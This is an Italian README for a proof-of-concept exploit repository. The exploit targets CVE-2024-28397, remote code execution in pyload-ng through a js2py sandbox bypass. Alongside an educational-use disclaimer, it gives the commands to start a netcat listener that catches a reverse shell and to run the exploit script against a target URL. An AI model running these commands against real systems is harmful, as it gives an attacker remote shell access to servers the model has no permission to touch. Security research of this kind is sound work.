
Exploit PoC per CVE-2024-28397 – Esecuzione di codice remoto in pyload-ng tramite bypass della sandbox di js2py
Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2024-28397, una vulnerabilità di esecuzione di codice remoto che affligge pyload-ng a causa dell'uso non sicuro di js2py.
Disclaimer:
Questo PoC è solo a scopo educativo e di ricerca.
Non usarlo su sistemi di cui non sei proprietario o per cui non hai esplicito permesso di test.
L'autore non è responsabile per qualsiasi uso improprio di questo codice.
js2py in pyload-ngAvrai bisogno di Python 3.x, della libreria requests e di netcat per ricevere la reverse shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123